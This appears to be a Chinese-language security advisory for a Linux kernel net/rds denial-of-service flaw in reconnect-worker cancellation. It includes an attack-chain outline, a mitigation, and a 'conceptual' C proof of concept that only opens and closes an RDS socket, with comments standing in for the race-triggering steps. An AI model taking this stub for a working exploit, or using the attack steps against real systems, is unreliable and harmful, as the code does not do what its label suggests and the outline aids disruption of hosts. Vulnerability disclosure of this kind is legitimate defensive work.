CVE-2026-43230 CVSS 7.5 高危

CVE-2026-43230 Linux内核net/rds拒绝服务漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43230

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核的net/rds模块中存在一个逻辑缺陷，涉及重连工作队列的处理。当系统取消重连worker时，如果该worker尚未被调度执行，代码未能正确清除“重连挂起”标志位。该错误导致该状态位永久保持开启状态，使得RDS连接无法正常恢复，从而造成拒绝服务。

技术细节

该漏洞源于Linux内核RDS（可靠数据报套接字）子系统的状态管理机制。在RDS连接中断时，内核会设置`RDS_RECONNECT_PENDING`位并调度一个工作队列（worker）来执行重连操作。漏洞在于取消worker的逻辑分支不完整：如果在worker被实际调度执行之前触发了取消操作（例如由于连接关闭或超时），代码路径中没有包含清除`RDS_RECONNECT_PENDING`位的指令。这导致连接状态机陷入死锁，系统始终认为重连正在进行中，从而拒绝后续所有合法的重连请求。攻击者可以通过控制网络时序或触发特定的套接字操作序列来利用此竞态条件，导致目标系统的RDS通信功能永久瘫痪。

攻击链分析

STEP 1

步骤1

攻击者建立或控制与目标系统的RDS连接，或诱导系统进入RDS连接状态。

STEP 2

步骤2

攻击者触发网络中断或发送特制数据包，导致目标系统启动重连流程，设置RDS_RECONNECT_PENDING位并调度重连worker。

STEP 3

步骤3

在重连worker被CPU调度执行之前，攻击者迅速触发取消操作（如关闭套接字或模块卸载）。

STEP 4

步骤4

由于取消逻辑未清除状态位，RDS_RECONNECT_PENDING位永久置位。

STEP 5

步骤5

系统后续尝试重连时因检测到位已设置而放弃，导致服务不可用，达成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43230 (Conceptual)
 * This code demonstrates the socket manipulation required to trigger the race condition.
 * Successful exploitation leads to the RDS reconnect pending bit being set permanently.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <errno.h>

#ifndef AF_RDS
#define AF_RDS 21
#endif

int main() {
    int sockfd;
    struct sockaddr_storage addr;
    socklen_t len = sizeof(addr);

    printf("[*] Creating RDS socket...\n");
    sockfd = socket(AF_RDS, SOCK_SEQPACKET, 0);
    if (sockfd < 0) {
        perror("socket");
        return 1;
    }

    printf("[*] Socket created (fd=%d). Attempting to trigger race condition...\n", sockfd);
    
    // To trigger the vulnerability, an attacker typically needs to force a reconnect
    // state and then rapidly close the socket or manipulate the interface to cancel
    // the worker before it executes.
    
    // Simulate connection setup (simplified)
    memset(&addr, 0, len);
    // In a real scenario, bind/connect to a target to initiate RDS state.
    // if (bind(sockfd, (struct sockaddr *)&addr, len) < 0) ...

    printf("[*] Triggering disconnect/reconnect sequence...\n");
    
    // The race condition window is small and depends on system load/scheduling.
    // Exploitation involves closing the socket or bringing the interface down
    // immediately after a connection failure that queues the reconnect worker.

    close(sockfd);
    printf("[*] Socket closed. If exploited, the reconnect pending bit remains set.\n");

    return 0;
}

影响范围

Linux Kernel (具体受影响版本需参照Git提交记录，通常为修复补丁提交前的版本)

防御指南

临时缓解措施

如果业务不需要使用RDS（可靠数据报套接字）服务，建议通过命令 `modprobe -r rds` 卸载该模块以暂时缓解风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表